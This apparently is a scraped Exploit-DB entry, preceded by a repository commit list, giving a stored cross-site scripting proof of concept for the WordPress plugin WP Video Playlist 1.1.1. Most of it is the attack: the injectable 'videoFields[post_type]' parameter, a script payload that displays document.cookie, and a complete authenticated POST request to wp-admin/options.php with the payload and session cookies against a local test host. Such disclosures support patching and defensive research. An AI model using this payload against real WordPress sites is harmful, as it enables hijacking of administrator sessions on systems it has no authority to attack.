aa67db6cea
15 changes to exploits/shellcodes/ghdb MinIO < 2024-01-31T20-20-33Z - Privilege Escalation PrusaSlicer 2.6.1 - Arbitrary code execution GUnet OpenEclass E-learning platform 3.15 - 'certbadge.php' Unrestricted File Upload HTMLy Version v2.9.6 - Stored XSS Moodle 3.10.1 - Authenticated Blind Time-Based SQL Injection - _sort_ parameter PopojiCMS Version 2.0.1 - Remote Command Execution Quick CMS v6.7 en 2023 - 'password' SQLi Service Provider Management System v1.0 - SQL Injection WBCE 1.6.0 - Unauthenticated SQL injection WBCE CMS Version 1.6.1 - Remote Command Execution (Authenticated) Wordpress Plugin Playlist for Youtube 1.32 - Stored Cross-Site Scripting (XSS) Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS) Ray OS v2.6.3 - Command Injection RCE(Unauthorized) Terratec dmx_6fire USB - Unquoted Service Path
36 lines
No EOL
2.5 KiB
Text
36 lines
No EOL
2.5 KiB
Text
# Exploit Title: Wordpress Plugin WP Video Playlist 1.1.1 - Stored Cross-Site Scripting (XSS)
|
|
# Date: 12 April 2024
|
|
# Exploit Author: Erdemstar
|
|
# Vendor: https://wordpress.com/
|
|
# Version: 1.1.1
|
|
|
|
# Proof Of Concept:
|
|
1. Click Add Video part and enter the XSS payload as below into the first input of form or Request body named "videoFields[post_type]".
|
|
|
|
# PoC Video: https://www.youtube.com/watch?v=05dM91FiG9w
|
|
# Vulnerable Property at Request: videoFields[post_type]
|
|
# Payload: <script>alert(document.cookie)</script>
|
|
# Request:
|
|
POST /wp-admin/options.php HTTP/2
|
|
Host: erdemstar.local
|
|
Cookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9
|
|
Content-Length: 395
|
|
Cache-Control: max-age=0
|
|
Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"
|
|
Sec-Ch-Ua-Mobile: ?0
|
|
Sec-Ch-Ua-Platform: "macOS"
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: https://erdemstar.local
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-User: ?1
|
|
Sec-Fetch-Dest: document
|
|
Referer: https://erdemstar.local/wp-admin/admin.php?page=video_manager
|
|
Accept-Encoding: gzip, deflate, br
|
|
Accept-Language: en-US,en;q=0.9
|
|
Priority: u=0, i
|
|
|
|
option_page=mediaManagerCPT&action=update&_wpnonce=29af746404&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dvideo_manager%26settings-updated%3Dtrue&videoFields%5BmeidaId%5D=1&videoFields%5Bpost_type%5D=<script>alert(document.cookie)</script>&videoFields%5BmediaUri%5D=dummy&videoFields%5BoptionName%5D=videoFields&videoFields%5BoptionType%5D=add&submit=Save+Changes |